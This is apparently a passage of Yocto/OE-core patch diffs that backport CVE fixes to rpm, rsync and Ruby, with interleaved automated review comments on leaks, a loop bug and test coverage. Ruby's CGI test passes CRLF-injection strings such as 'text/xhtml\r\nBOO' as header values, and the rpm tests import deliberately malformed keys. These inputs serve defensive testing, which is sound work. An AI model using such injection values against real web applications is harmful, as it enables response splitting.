190+++ b/tests/data/keys/CVE-2021-3521-badbind.asc
191@@ -0,0 +1,25 @@
192+-----BEGIN PGP PUBLIC KEY BLOCK-----
193+Version: rpm-4.17.90 (NSS-3)
194+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214+=WCfs
215+-----END PGP PUBLIC KEY BLOCK-----
216+
217diff --git a/tests/data/keys/CVE-2021-3521-nosubsig-last.asc b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
218new file mode 100644
219index 0000000000..aea00f9d7a
220--- /dev/null
221+++ b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
222@@ -0,0 +1,25 @@
223+-----BEGIN PGP PUBLIC KEY BLOCK-----
224+Version: rpm-4.17.90 (NSS-3)
225+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245+=WCfs
246+-----END PGP PUBLIC KEY BLOCK-----
247+
248diff --git a/tests/data/keys/CVE-2021-3521-nosubsig.asc b/tests/data/keys/CVE-2021-3521-nosubsig.asc
249new file mode 100644
250index 0000000000..3a2e7417f8
251--- /dev/null
252+++ b/tests/data/keys/CVE-2021-3521-nosubsig.asc
253@@ -0,0 +1,37 @@
254+-----BEGIN PGP PUBLIC KEY BLOCK-----
255+Version: rpm-4.17.90 (NSS-3)
256+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288+=rRop
289+-----END PGP PUBLIC KEY BLOCK-----
290+
291diff --git a/tests/rpmsigdig.at b/tests/rpmsigdig.at
292index 0f8f2b4884..c8b9f139e1 100644
293--- a/tests/rpmsigdig.at
294+++ b/tests/rpmsigdig.at
295@@ -240,6 +240,34 @@ gpg(185e6146f00650f8) = 4:185e6146f00650f8-58e63918
296 [])
297 AT_CLEANUP
298
299+AT_SETUP([rpmkeys --import invalid keys])
300+AT_KEYWORDS([rpmkeys import])
301+RPMDB_INIT
302+
303+AT_CHECK([
304+runroot rpmkeys --import /data/keys/CVE-2021-3521-badbind.asc
305+],
306+[1],
307+[],
308+[error: /data/keys/CVE-2021-3521-badbind.asc: key 1 import failed.]
309+)
310+AT_CHECK([
311+runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig.asc
312+],
313+[1],
314+[],
315+[error: /data/keys/CVE-2021-3521-nosubsig.asc: key 1 import failed.]
316+)
317+
318+AT_CHECK([
319+runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig-last.asc
320+],
321+[1],
322+[],
323+[error: /data/keys/CVE-2021-3521-nosubsig-last.asc: key 1 import failed.]
324+)
325+AT_CLEANUP
326+
327 # ------------------------------
328 # Test pre-built package verification
329 AT_SETUP([rpmkeys -K <signed> 1])
330
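Review bot: In the rewritten pgpPrtParams() loop, `selfsig` is allocated at patch line 128, but the two `break` paths that follow (pgpPrtPkt() failing at lines 131-132 and the sigtype mismatch at lines 138-139) leave the loop before `selfsig = pgpDigParamsFree(selfsig);` at line 144 runs, and the visible cleanup after the loop only does `free(all);`. Those paths are taken for malformed key material, so each rejected key appears to leak one pgpDigParams. Adding `selfsig = pgpDigParamsFree(selfsig);` next to `free(all);` would cover both, assuming pgpDigParamsFree() tolerates NULL (its definition is not in this hunk). The tail of the function lies outside the hunk, so a later free there cannot be ruled out.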
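--- a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
+++ b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
@@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org"
 LICENSE = "GPL-2.0"
 LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a"
 
-SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
+SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x;protocol=https \
  file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \
  file://0001-Do-not-read-config-files-from-HOME.patch \
  file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \
@@ -44,6 +44,13 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
  file://0001-mono-find-provides-requires-do-not-use-monodis-from-.patch \
  file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \
  file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \
+ file://0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch \
+ file://CVE-2021-3421.patch \
+ file://CVE-2021-20266.patch \
+ file://CVE-2021-3521-01.patch \
+ file://CVE-2021-3521-02.patch \
+ file://CVE-2021-3521-03.patch \
+ file://CVE-2021-3521.patch \
  "
 
 PE = "1"
@@ -60,7 +67,8 @@ export PYTHON_ABI
 # OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe
 EXTRA_AUTORECONF_append = " --exclude=gnu-configize"
 
-EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl"
+# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages
+EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl --with-vendor=pc"
 EXTRA_OECONF_append_libc-musl = " --disable-nls"
 
 # --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs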
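--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
@@ -0,0 +1,31 @@
+From fabef23bea6e9963c06e218586fda1a823e3c6bf Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Mon, 8 Aug 2022 21:30:21 -0700
+Subject: [PATCH] Fix --relative when copying an absolute path.
+
+CVE: CVE-2022-29154
+Upstream-Status: Backport [https://github.com/WayneD/rsync/commit/fabef23bea6e9963c06e218586fda1a823e3c6bf]
+Signed-off-by: Matthias Schmitz <matthias.schmitz@port4949.net>
+---
+ exclude.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/exclude.c b/exclude.c
+index 2394023f..ba5ca5a3 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -434,8 +434,10 @@ void add_implied_include(const char *arg)
+ *p++ = *cp++;
+ break;
+ case '/':
+- if (p[-1] == '/') /* This is safe because of the initial slash. */
++ if (p[-1] == '/') { /* This is safe because of the initial slash. */
++ cp++;
+ break;
++ }
+ if (relative_paths) {
+ filter_rule const *ent;
+ int found = 0;
+--
+2.39.2
+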
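--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
@@ -0,0 +1,334 @@
+From b7231c7d02cfb65d291af74ff66e7d8c507ee871 Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Sun, 31 Jul 2022 16:55:34 -0700
+Subject: [PATCH] Some extra file-list safety checks.
+
+CVE-2022-29154 rsync: remote arbitrary files write inside the
+
+Upstream-Status: Backport from [https://git.samba.org/?p=rsync.git;a=patch;h=b7231c7d02cfb65d291af74ff66e7d8c507ee871]
+CVE:CVE-2022-29154
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ exclude.c | 127 ++++++++++++++++++++++++++++++++++++++++++++++++++++-
+ flist.c | 17 ++++++-
+ io.c | 4 ++
+ main.c | 7 ++-
+ receiver.c | 11 +++--
+ 5 files changed, 158 insertions(+), 8 deletions(-)
+
+diff --git a/exclude.c b/exclude.c
+index 7989fb3..e146e96 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -26,16 +26,21 @@ extern int am_server;
+ extern int am_sender;
+ extern int eol_nulls;
+ extern int io_error;
++extern int xfer_dirs;
++extern int recurse;
+ extern int local_server;
+ extern int prune_empty_dirs;
+ extern int ignore_perishable;
++extern int relative_paths;
+ extern int delete_mode;
+ extern int delete_excluded;
+ extern int cvs_exclude;
+ extern int sanitize_paths;
+ extern int protocol_version;
++extern int list_only;
+ extern int module_id;
+
++extern char *filesfrom_host;
+ extern char curr_dir[MAXPATHLEN];
+ extern unsigned int curr_dir_len;
+ extern unsigned int module_dirlen;
+@@ -43,8 +48,10 @@ extern unsigned int module_dirlen;
+ filter_rule_list filter_list = { .debug_type = "" };
+ filter_rule_list cvs_filter_list = { .debug_type = " [global CVS]" };
+ filter_rule_list daemon_filter_list = { .debug_type = " [daemon]" };
++filter_rule_list implied_filter_list = { .debug_type = " [implied]" };
+
+ int saw_xattr_filter = 0;
++int trust_sender_filter = 0;
+
+ /* Need room enough for ":MODS " prefix plus some room to grow. */
+ #define MAX_RULE_PREFIX (16)
+@@ -293,6 +300,123 @@ static void add_rule(filter_rule_list *listp, const char *pat, unsigned int pat_
+ }
+ }
+
++/* Each arg the client sends to the remote sender turns into an implied include
++ * that the receiver uses to validate the file list from the sender. */
++void add_implied_include(const char *arg)
++{
++ filter_rule *rule;
++ int arg_len, saw_wild = 0, backslash_cnt = 0;
++ int slash_cnt = 1; /* We know we're adding a leading slash. */
++ const char *cp;
++ char *p;
++ if (relative_paths) {
++ cp = strstr(arg, "/./");
++ if (cp)
++ arg = cp+3;
++ } else {
++ if ((cp = strrchr(arg, '/')) != NULL)
++ arg = cp + 1;
++ }
++ arg_len = strlen(arg);
++ if (arg_len) {
++ if (strpbrk(arg, "*[?")) {
++ /* We need to add room to escape backslashes if wildcard chars are present. */
++ cp = arg;
++ while ((cp = strchr(cp, '\\')) != NULL) {
++ arg_len++;
++ cp++;
++ }
++ saw_wild = 1;
++ }
++ arg_len++; /* Leave room for the prefixed slash */
++ rule = new0(filter_rule);
++ if (!implied_filter_list.head)
++ implied_filter_list.head = implied_filter_list.tail = rule;
++ else {
++ rule->next = implied_filter_list.head;
++ implied_filter_list.head = rule;
++ }
++ rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++ p = rule->pattern = new_array(char, arg_len + 1);
++ *p++ = '/';
++ cp = arg;
++ while (*cp) {
++ switch (*cp) {
++ case '\\':
++ backslash_cnt++;
++ if (saw_wild)
++ *p++ = '\\';
++ *p++ = *cp++;
++ break;
++ case '/':
++ if (p[-1] == '/') /* This is safe because of the initial slash. */
++ break;
++ if (relative_paths) {
++ filter_rule const *ent;
++ int found = 0;
++ *p = '\0';
++ for (ent = implied_filter_list.head; ent; ent = ent->next) {
++ if (ent != rule && strcmp(ent->pattern, rule->pattern) == 0)
++ found = 1;
++ }
++ if (!found) {
++ filter_rule *R_rule = new0(filter_rule);
++ R_rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++ R_rule->pattern = strdup(rule->pattern);
++ R_rule->u.slash_cnt = slash_cnt;
++ R_rule->next = implied_filter_list.head;
++ implied_filter_list.head = R_rule;
++ }
++ }
++ slash_cnt++;
++ *p++ = *cp++;
++ break;
++ default:
++ *p++ = *cp++;
++ break;
++ }
++ }
++ *p = '\0';
++ rule->u.slash_cnt = slash_cnt;
++ arg = (const char *)rule->pattern;
++ }
++
++ if (recurse || xfer_dirs) {
++ /* Now create a rule with an added "/" & "**" or "*" at the end */
++ rule = new0(filter_rule);
++ if (recurse)
++ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD | FILTRULE_WILD2;
++ else
++ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD;
++ /* A +4 in the len leaves enough room for / * * \0 or / * \0 \0 */
++ if (!saw_wild && backslash_cnt) {
++ /* We are appending a wildcard, so now the backslashes need to be escaped. */
++ p = rule->pattern = new_array(char, arg_len + backslash_cnt + 3 + 1);
++ cp = arg;
++ while (*cp) {
++ if (*cp == '\\')
++ *p++ = '\\';
++ *p++ = *cp++;
++ }
++ } else {
++ p = rule->pattern = new_array(char, arg_len + 3 + 1);
++ if (arg_len) {
++ memcpy(p, arg, arg_len);
++ p += arg_len;
++ }
++ }
++ if (p[-1] != '/')
++ *p++ = '/';
++ *p++ = '*';
++ if (recurse)
++ *p++ = '*';
++ *p = '\0';
++ rule->u.slash_cnt = slash_cnt + 1;
++ rule->next = implied_filter_list.head;
++ implied_filter_list.head = rule;
++ }
++}
++
+ /* This frees any non-inherited items, leaving just inherited items on the list. */
+ static void pop_filter_list(filter_rule_list *listp)
+ {
+@@ -721,7 +845,7 @@ static void report_filter_result(enum logcode code, char const *name,
+ : name_flags & NAME_IS_DIR ? "directory"
+ : "file";
+ rprintf(code, "[%s] %sing %s %s because of pattern %s%s%s\n",
+- w, actions[*w!='s'][!(ent->rflags & FILTRULE_INCLUDE)],
++ w, actions[*w=='g'][!(ent->rflags & FILTRULE_INCLUDE)],
+ t, name, ent->pattern,
+ ent->rflags & FILTRULE_DIRECTORY ? "/" : "", type);
+ }
+@@ -894,6 +1018,7 @@ static filter_rule *parse_rule_tok(const char **rulestr_ptr,
+ }
+ switch (ch) {
+ case ':':
++ trust_sender_filter = 1;
+ rule->rflags |= FILTRULE_PERDIR_MERGE
+ | FILTRULE_FINISH_SETUP;
+ /* FALL THROUGH */
+diff --git a/flist.c b/flist.c
+index 499440c..630d685 100644
+--- a/flist.c
++++ b/flist.c
+@@ -70,6 +70,7 @@ extern int need_unsorted_flist;
+ extern int sender_symlink_iconv;
+ extern int output_needs_newline;
+ extern int sender_keeps_checksum;
++extern int trust_sender_filter;
+ extern int unsort_ndx;
+ extern uid_t our_uid;
+ extern struct stats stats;
+@@ -80,8 +81,7 @@ extern char curr_dir[MAXPATHLEN];
+
+ extern struct chmod_mode_struct *chmod_modes;
+
+-extern filter_rule_list filter_list;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list filter_list, implied_filter_list, daemon_filter_list;
+
+ #ifdef ICONV_OPTION
+ extern int filesfrom_convert;
+@@ -904,6 +904,19 @@ static struct file_struct *recv_file_entry(int f, struct file_list *flist, int x
+ exit_cleanup(RERR_UNSUPPORTED);
+ }
+
++ if (*thisname != '.' || thisname[1] != '\0') {
++ int filt_flags = S_ISDIR(mode) ? NAME_IS_DIR : NAME_IS_FILE;
++ if (!trust_sender_filter /* a per-dir filter rule means we must trust the sender's filtering */
++ && filter_list.head && check_filter(&filter_list, FINFO, thisname, filt_flags) < 0) {
++ rprintf(FERROR, "ERROR: rejecting excluded file-list name: %s\n", thisname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
++ if (implied_filter_list.head && check_filter(&implied_filter_list, FINFO, thisname, filt_flags) <= 0) {
++ rprintf(FERROR, "ERROR: rejecting unrequested file-list name: %s\n", thisname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
++ }
++
+ if (inc_recurse && S_ISDIR(mode)) {
+ if (one_file_system) {
+ /* Room to save the dir's device for -x */
+diff --git a/io.c b/io.c
+index c04dbd5..698a7da 100644
+--- a/io.c
++++ b/io.c
+@@ -415,6 +415,7 @@ static void forward_filesfrom_data(void)
+ while (s != eob) {
+ if (*s++ == '\0') {
+ ff_xb.len = s - sob - 1;
++ add_implied_include(sob);
+ if (iconvbufs(ic_send, &ff_xb, &iobuf.out, flags) < 0)
+ exit_cleanup(RERR_PROTOCOL); /* impossible? */
+ write_buf(iobuf.out_fd, s-1, 1); /* Send the '\0'. */
+@@ -446,9 +447,12 @@ static void forward_filesfrom_data(void)
+ char *f = ff_xb.buf + ff_xb.pos;
+ char *t = ff_xb.buf;
+ char *eob = f + len;
++ char *cur = t;
+ /* Eliminate any multi-'\0' runs. */
+ while (f != eob) {
+ if (!(*t++ = *f++)) {
++ add_implied_include(cur);
++ cur = t;
+ while (f != eob && *f == '\0')
+ f++;
+ }
+diff --git a/main.c b/main.c
+index ee9630f..6ec56e7 100644
+--- a/main.c
++++ b/main.c
+@@ -78,6 +78,7 @@ extern BOOL flist_receiving_enabled;
+ extern BOOL shutting_down;
+ extern int backup_dir_len;
+ extern int basis_dir_cnt;
++extern int trust_sender_filter;
+ extern struct stats stats;
+ extern char *stdout_format;
+ extern char *logfile_format;
+@@ -93,7 +94,7 @@ extern char curr_dir[MAXPATHLEN];
+ extern char backup_dir_buf[MAXPATHLEN];
+ extern char *basis_dir[MAX_BASIS_DIRS+1];
+ extern struct file_list *first_flist;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list daemon_filter_list, implied_filter_list;
+
+ uid_t our_uid;
+ gid_t our_gid;
+@@ -534,6 +535,7 @@ static pid_t do_cmd(char *cmd, char *machine, char *user, char **remote_argv, in
+ #ifdef ICONV_CONST
+ setup_iconv();
+ #endif
++ trust_sender_filter = 1;
+ } else if (local_server) {
+ /* If the user didn't request --[no-]whole-file, force
+ * it on, but only if we're not batch processing. */
+@@ -1358,6 +1360,8 @@ static int start_client(int argc, char *argv[])
+ char *dummy_host;
+ int dummy_port = rsync_port;
+ int i;
++ if (filesfrom_fd < 0)
++ add_implied_include(remote_argv[0]);
+ /* For remote source, any extra source args must have either
+ * the same hostname or an empty hostname. */
+ for (i = 1; i < remote_argc; i++) {
+@@ -1381,6 +1385,7 @@ static int start_client(int argc, char *argv[])
+ if (!rsync_port && !*arg) /* Turn an empty arg into a dot dir. */
+ arg = ".";
+ remote_argv[i] = arg;
++ add_implied_include(arg);
+ }
+ }
+
+diff --git a/receiver.c b/receiver.c
+index d6a48f1..c0aa893 100644
+--- a/receiver.c
++++ b/receiver.c
+@@ -577,10 +577,13 @@ int recv_files(int f_in, int f_out, char *local_name)
+ if (DEBUG_GTE(RECV, 1))
+ rprintf(FINFO, "recv_files(%s)\n", fname);
+
+- if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')
+- && check_filter(&daemon_filter_list, FLOG, fname, 0) < 0) {
+- rprintf(FERROR, "attempt to hack rsync failed.\n");
+- exit_cleanup(RERR_PROTOCOL);
++ if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')) {
++ int filt_flags = S_ISDIR(file->mode) ? NAME_IS_DIR : NAME_IS_FILE;
++ if (check_filter(&daemon_filter_list, FLOG, fname, filt_flags) < 0) {
++ rprintf(FERROR, "ERROR: rejecting file transfer request for daemon excluded file: %s\n",
++ fname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
+ }
+
+ #ifdef SUPPORT_XATTRS
+--
+2.30.2
+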
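Review bot: In the added add_implied_include(), the `case '/':` branch at patch lines 108-110 leaves the switch with `break` when `p[-1] == '/'` without advancing `cp`, so the enclosing `while (*cp)` loop makes no progress on a slash that follows another slash, which includes an argument that itself begins with '/' because the pattern is seeded with `*p++ = '/'`. The separate 0001-Fix-relative-when-copying-an-absolute-path.patch in this commit adds the missing `cp++`, so this patch is only safe when applied together with it. I would record that in the header, e.g. `Dependent patch: 0001-Fix-relative-when-copying-an-absolute-path.patch`, so the follow-up is not dropped or reordered later. The header tag is also written `CVE:CVE-2022-29154`, without the space the other patches on this page use (`CVE: CVE-2022-29154`), which tag-matching tooling may not recognise.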
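--- a/meta/recipes-devtools/rsync/rsync_3.1.3.bb
+++ b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
@@ -1,5 +1,6 @@
 SUMMARY = "File synchronization tool"
 HOMEPAGE = "http://rsync.samba.org/"
+DESCRIPTION = "rsync is an open source utility that provides fast incremental file transfer."
 BUGTRACKER = "http://rsync.samba.org/bugzilla.html"
 SECTION = "console/network"
 # GPLv2+ (<< 3.0.0), GPLv3+ (>= 3.0.0)
@@ -15,6 +16,8 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/src/${BP}.tar.gz \
  file://CVE-2016-9841.patch \
  file://CVE-2016-9842.patch \
  file://CVE-2016-9843.patch \
+ file://CVE-2022-29154.patch \
+ file://0001-Fix-relative-when-copying-an-absolute-path.patch \
 "
 
 SRC_URI[md5sum] = "1581a588fde9d89f6bc6201e8129afaf"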
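--- a/meta/recipes-devtools/ruby/ruby.inc
+++ b/meta/recipes-devtools/ruby/ruby.inc
@@ -14,8 +14,8 @@ LIC_FILES_CHKSUM = "\
  file://LEGAL;md5=2b6d62dc0d608f34d510ca3f428110ec \
 "
 
-DEPENDS = "ruby-native zlib openssl libyaml gdbm readline libffi"
-DEPENDS_class-native = "openssl-native libyaml-native readline-native zlib-native"
+DEPENDS = "zlib openssl libyaml gdbm readline libffi"
+DEPENDS_append_class-target = " ruby-native"
 
 SHRT_VER = "${@oe.utils.trim_version("${PV}", 2)}"
 SRC_URI = "http://cache.ruby-lang.org/pub/ruby/${SHRT_VER}/ruby-${PV}.tar.gz \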
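--- a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 8946bb38b4d87549f0d99ed73c62c41933f97cc7 Mon Sep 17 00:00:00 2001
-From: Yusuke Endoh <mame@ruby-lang.org>
-Date: Tue, 29 Sep 2020 13:15:58 +0900
-Subject: [PATCH] Make it more strict to interpret some headers
-
-Some regexps were too tolerant.
-
-Upstream-Status: Backport
-[https://github.com/ruby/webrick/commit/8946bb38b4d87549f0d99ed73c62c41933f97cc7]
-CVE: CVE-2020-25613
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- lib/webrick/httprequest.rb | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/lib/webrick/httprequest.rb b/lib/webrick/httprequest.rb
-index 294bd91..d34eac7 100644
---- a/lib/webrick/httprequest.rb
-+++ b/lib/webrick/httprequest.rb
-@@ -227,9 +227,9 @@ def parse(socket=nil)
- raise HTTPStatus::BadRequest, "bad URI `#{@unparsed_uri}'."
- end
-
-- if /close/io =~ self["connection"]
-+ if /\Aclose\z/io =~ self["connection"]
- @keep_alive = false
-- elsif /keep-alive/io =~ self["connection"]
-+ elsif /\Akeep-alive\z/io =~ self["connection"]
- @keep_alive = true
- elsif @http_version < "1.1"
- @keep_alive = false
-@@ -508,7 +508,7 @@ def read_body(socket, block)
- return unless socket
- if tc = self['transfer-encoding']
- case tc
-- when /chunked/io then read_chunked(socket, block)
-+ when /\Achunked\z/io then read_chunked(socket, block)
- else raise HTTPStatus::NotImplemented, "Transfer-Encoding: #{tc}."
- end
- elsif self['content-length'] || @remaining_size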
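--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
@@ -0,0 +1,139 @@
+From 64c5045c0a6b84fdb938a8465a0890e5f7162708 Mon Sep 17 00:00:00 2001
+From: Yusuke Endoh <mame@ruby-lang.org>
+Date: Tue, 22 Nov 2022 10:49:27 +0900
+Subject: [PATCH] Prevent CRLF injection
+
+Throw a RuntimeError if the HTTP response header contains CR or LF to
+prevent HTTP response splitting.
+
+https://hackerone.com/reports/1204695
+
+Upstream-Status: Backport [https://github.com/ruby/cgi/commit/64c5045c0a6b84fdb938a8465a0890e5f7162708]
+CVE: CVE-2021-33621
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/cgi/core.rb | 45 +++++++++++++++++++++++--------------
+ test/cgi/test_cgi_header.rb | 8 +++++++
+ 2 files changed, 36 insertions(+), 17 deletions(-)
+
+diff --git a/lib/cgi/core.rb b/lib/cgi/core.rb
+index bec76e0..62e6068 100644
+--- a/lib/cgi/core.rb
++++ b/lib/cgi/core.rb
+@@ -188,17 +188,28 @@ class CGI
+ # Using #header with the HTML5 tag maker will create a <header> element.
+ alias :header :http_header
+
++ def _no_crlf_check(str)
++ if str
++ str = str.to_s
++ raise "A HTTP status or header field must not include CR and LF" if str =~ /[\r\n]/
++ str
++ else
++ nil
++ end
++ end
++ private :_no_crlf_check
++
+ def _header_for_string(content_type) #:nodoc:
+ buf = ''.dup
+ if nph?()
+- buf << "#{$CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'} 200 OK#{EOL}"
++ buf << "#{_no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'} 200 OK#{EOL}"
+ buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+- buf << "Server: #{$CGI_ENV['SERVER_SOFTWARE']}#{EOL}"
++ buf << "Server: #{_no_crlf_check($CGI_ENV['SERVER_SOFTWARE'])}#{EOL}"
+ buf << "Connection: close#{EOL}"
+ end
+- buf << "Content-Type: #{content_type}#{EOL}"
++ buf << "Content-Type: #{_no_crlf_check(content_type)}#{EOL}"
+ if @output_cookies
+- @output_cookies.each {|cookie| buf << "Set-Cookie: #{cookie}#{EOL}" }
++ @output_cookies.each {|cookie| buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}" }
+ end
+ return buf
+ end # _header_for_string
+@@ -213,9 +224,9 @@ class CGI
+ ## NPH
+ options.delete('nph') if defined?(MOD_RUBY)
+ if options.delete('nph') || nph?()
+- protocol = $CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'
++ protocol = _no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'
+ status = options.delete('status')
+- status = HTTP_STATUS[status] || status || '200 OK'
++ status = HTTP_STATUS[status] || _no_crlf_check(status) || '200 OK'
+ buf << "#{protocol} #{status}#{EOL}"
+ buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+ options['server'] ||= $CGI_ENV['SERVER_SOFTWARE'] || ''
+@@ -223,38 +234,38 @@ class CGI
+ end
+ ## common headers
+ status = options.delete('status')
+- buf << "Status: #{HTTP_STATUS[status] || status}#{EOL}" if status
++ buf << "Status: #{HTTP_STATUS[status] || _no_crlf_check(status)}#{EOL}" if status
+ server = options.delete('server')
+- buf << "Server: #{server}#{EOL}" if server
++ buf << "Server: #{_no_crlf_check(server)}#{EOL}" if server
+ connection = options.delete('connection')
+- buf << "Connection: #{connection}#{EOL}" if connection
++ buf << "Connection: #{_no_crlf_check(connection)}#{EOL}" if connection
+ type = options.delete('type')
+- buf << "Content-Type: #{type}#{EOL}" #if type
++ buf << "Content-Type: #{_no_crlf_check(type)}#{EOL}" #if type
+ length = options.delete('length')
+- buf << "Content-Length: #{length}#{EOL}" if length
++ buf << "Content-Length: #{_no_crlf_check(length)}#{EOL}" if length
+ language = options.delete('language')
+- buf << "Content-Language: #{language}#{EOL}" if language
++ buf << "Content-Language: #{_no_crlf_check(language)}#{EOL}" if language
+ expires = options.delete('expires')
+ buf << "Expires: #{CGI.rfc1123_date(expires)}#{EOL}" if expires
+ ## cookie
+ if cookie = options.delete('cookie')
+ case cookie
+ when String, Cookie
+- buf << "Set-Cookie: #{cookie}#{EOL}"
++ buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}"
+ when Array
+ arr = cookie
+- arr.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ arr.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ when Hash
+ hash = cookie
+- hash.each_value {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ hash.each_value {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ end
+ end
+ if @output_cookies
+- @output_cookies.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ @output_cookies.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ end
+ ## other headers
+ options.each do |key, value|
+- buf << "#{key}: #{value}#{EOL}"
++ buf << "#{_no_crlf_check(key)}: #{_no_crlf_check(value)}#{EOL}"
+ end
+ return buf
+ end # _header_for_hash
+diff --git a/test/cgi/test_cgi_header.rb b/test/cgi/test_cgi_header.rb
+index bab2d03..ec2f4de 100644
+--- a/test/cgi/test_cgi_header.rb
++++ b/test/cgi/test_cgi_header.rb
+@@ -176,6 +176,14 @@ class CGIHeaderTest < Test::Unit::TestCase
+ end
+
+
++ def test_cgi_http_header_crlf_injection
++ cgi = CGI.new
++ assert_raise(RuntimeError) { cgi.http_header("text/xhtml\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("type" => "text/xhtml\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("status" => "200 OK\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("location" => "text/xhtml\r\nBOO") }
++ end
++
+
+ instance_methods.each do |method|
+ private method if method =~ /^test_(.*)/ && $1 != ENV['TEST']
+--
+2.25.1
+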
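Review bot: The added test_cgi_http_header_crlf_injection (patch lines 126-132) exercises the content-type string, `"type"`, `"status"` and one generic header value, but none of the Set-Cookie paths or the header-name guard `_no_crlf_check(key)` that the same patch adds in _header_for_hash. I would add one assertion per untested guard, modelled on the existing ones, for example `assert_raise(RuntimeError) { cgi.http_header("cookie" => "a=b\r\nBOO") }`, so a later refactor cannot drop a guard unnoticed. Separately, `Expires:` is still written through CGI.rfc1123_date(expires) without the check; that looks fine if the helper only formats a Time, which is not visible in this hunk.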
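--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
@@ -0,0 +1,61 @@
+From 957bb7cb81995f26c671afce0ee50a5c660e540e Mon Sep 17 00:00:00 2001
+From: Hiroshi SHIBATA <hsbt@ruby-lang.org>
+Date: Wed, 29 Mar 2023 13:28:25 +0900
+Subject: [PATCH] CVE-2023-28756
+
+CVE: CVE-2023-28756
+Upstream-Status: Backport [https://github.com/ruby/ruby/commit/957bb7cb81995f26c671afce0ee50a5c660e540e]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/time.rb | 6 +++---
+ test/test_time.rb | 9 +++++++++
+ 2 files changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/time.rb b/lib/time.rb
+index f27bacd..4a86e8e 100644
+--- a/lib/time.rb
++++ b/lib/time.rb
+@@ -501,8 +501,8 @@ class Time
+ (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+
+ (\d{2,})\s+
+ (\d{2})\s*
+- :\s*(\d{2})\s*
+- (?::\s*(\d{2}))?\s+
++ :\s*(\d{2})
++ (?:\s*:\s*(\d\d))?\s+
+ ([+-]\d{4}|
+ UT|GMT|EST|EDT|CST|CDT|MST|MDT|PST|PDT|[A-IK-Z])/ix =~ date
+ # Since RFC 2822 permit comments, the regexp has no right anchor.
+@@ -717,7 +717,7 @@ class Time
+ #
+ # If self is a UTC time, Z is used as TZD. [+-]hh:mm is used otherwise.
+ #
+- # +fractional_digits+ specifies a number of digits to use for fractional
++ # +fraction_digits+ specifies a number of digits to use for fractional
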